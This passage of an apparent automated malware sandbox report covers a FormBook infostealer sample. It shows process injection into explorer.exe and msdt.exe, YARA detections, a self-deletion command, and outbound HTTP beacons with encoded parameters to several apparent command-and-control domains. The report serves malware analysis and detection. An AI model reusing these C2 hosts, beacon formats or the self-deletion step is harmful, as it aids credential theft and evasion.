Jul 1, 2024 21:26:18.391942978 CEST	1166	IN	HTTP/1.1 200 OK Server: Cowboy Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1719861978&sid=e11707d5-02a7-43ef-b45e-2cf4d2036f7d&s=PC1fk9N9cYjuUR4q6zM8ohB4i5Q%2FGwM3U8k6madlWbs%3D"}]} Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1719861978&sid=e11707d5-02a7-43ef-b45e-2cf4d2036f7d&s=PC1fk9N9cYjuUR4q6zM8ohB4i5Q%2FGwM3U8k6madlWbs%3D Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]} Connection: close Content-Length: 346 Content-Disposition: inline; filename="index.html" Accept-Ranges: bytes Etag: "9cd2a7adffd97b7c902b0c653d50b1ab1b4ede32" Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Mon, 01 Jul 2024 19:26:18 GMT Via: 1.1 vegur Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 52 65 61 63 74 20 41 70 70 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 2f 62 75 6e 64 6c 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 [TRUNCATED] Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><title>React App</title><link href="https://cdn.jsdelivr.net/npm/bootstrap-icons/font/bootstrap-icons.css" rel="stylesheet"><script defer="defer" src="/bundle.js"></script></head><body><div id="root"></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49744	3.33.130.190	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 21:26:37.917249918 CEST	169	OUT	GET /dy13/?0N=KHSNHic8JLxjXMUSHETQCf7bHtnol1DEJErUxVAiAFyfNffMOGuO7wY/4dfl/zB0OOAe&Cj9LK=8pm41D0p HTTP/1.1 Host: www.soloparentconnect.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49745	104.21.74.89	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 21:26:58.313159943 CEST	159	OUT	GET /dy13/?Cj9LK=8pm41D0p&0N=LVVXn+3XMgScWvA+gustfxAGGBCnrJhvM+qFjqFs2KSrXwfcw3kbTxGlCeyN42Y88s8h HTTP/1.1 Host: www.b0ba138.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 1, 2024 21:26:58.785769939 CEST	905	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 01 Jul 2024 19:26:58 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 01 Jul 2024 20:26:58 GMT Location: https://www.b0ba138.xyz/dy13/?Cj9LK=8pm41D0p&0N=LVVXn+3XMgScWvA+gustfxAGGBCnrJhvM+qFjqFs2KSrXwfcw3kbTxGlCeyN42Y88s8h Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vTehGWNuYeIasdO33zJ2UKnQkzfWTjFN4%2FYARlS%2FVJVUK6ExlKYNq21nFJAvk4FbXMYWb4nb0H7hl%2Ft5Aqu2GXrHz8xirVxRixQu588nFNYU02slqZKM39X8PZLIr3HkKSs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c8ca710aa143b3-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49746	185.151.30.212	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 21:27:39.306121111 CEST	164	OUT	GET /dy13/?Cj9LK=8pm41D0p&0N=gDxxMnt83apdqDd0VF+A3hDmBOM78/3mfYHyjE1VNrqBuQQdV+RDpqUMPHOMA9Jp0yBU HTTP/1.1 Host: www.cpuk-finance.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49747	3.33.130.190	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 21:28:20.132765055 CEST	161	OUT	GET /dy13/?Cj9LK=8pm41D0p&0N=LqTJXJ5089mrTceMc0p83ZaAEN5I+KgWBnSPa3/fnIguC6SsnRdV26ZHA6opskXgqsBG HTTP/1.1 Host: www.umeshraja.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 1, 2024 21:28:20.604612112 CEST	341	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 01 Jul 2024 19:28:20 GMT Content-Type: text/html Content-Length: 201 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 43 6a 39 4c 4b 3d 38 70 6d 34 31 44 30 70 26 30 4e 3d 4c 71 54 4a 58 4a 35 30 38 39 6d 72 54 63 65 4d 63 30 70 38 33 5a 61 41 45 4e 35 49 2b 4b 67 57 42 6e 53 50 61 33 2f 66 6e 49 67 75 43 36 53 73 6e 52 64 56 32 36 5a 48 41 36 6f 70 73 6b 58 67 71 73 42 47 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Cj9LK=8pm41D0p&0N=LqTJXJ5089mrTceMc0p83ZaAEN5I+KgWBnSPa3/fnIguC6SsnRdV26ZHA6opskXgqsBG"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	147.92.43.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 21:28:41.127357006 CEST	161	OUT	GET /dy13/?0N=AG4Ye1FrkmCiFPqbKlnZ1dM6YK/DoI/B/9McINMFJI+SypkU6UbY406xkx1Fqy5gp249&Cj9LK=8pm41D0p HTTP/1.1 Host: www.883106.photos Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Target ID:	0
Start time:	15:24:51
Start date:	01/07/2024
Path:	C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe"
Imagebase:	0x5f0000
File size:	598'016 bytes
MD5 hash:	E97620420D37596704D9F4FA70303453
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1660916542.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1660916542.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1660916542.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1660916542.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1660916542.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	15:24:54
Start date:	01/07/2024
Path:	C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe"
Imagebase:	0x230000
File size:	598'016 bytes
MD5 hash:	E97620420D37596704D9F4FA70303453
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	3
Start time:	15:24:54
Start date:	01/07/2024
Path:	C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe"
Imagebase:	0x3b0000
File size:	598'016 bytes
MD5 hash:	E97620420D37596704D9F4FA70303453
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	4
Start time:	15:24:54
Start date:	01/07/2024
Path:	C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe"
Imagebase:	0x5f0000
File size:	598'016 bytes
MD5 hash:	E97620420D37596704D9F4FA70303453
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1771101612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1771101612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1771101612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1771101612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1771101612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Target ID:	5
Start time:	15:24:54
Start date:	01/07/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000005.00000002.4103236234.000000000FBD4000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Target ID:	6
Start time:	15:25:02
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msdt.exe"
Imagebase:	0x870000
File size:	389'632 bytes
MD5 hash:	BAA4458E429E7C906560FE4541ADFCFB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4091352522.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4091352522.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4091352522.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4091352522.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4091352522.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4091996606.0000000004650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4091996606.0000000004650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4091996606.0000000004650000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4091996606.0000000004650000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4091996606.0000000004650000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4091719375.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4091719375.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4091719375.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4091719375.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4091719375.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Target ID:	7
Start time:	15:25:05
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	15:25:05
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x5b0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true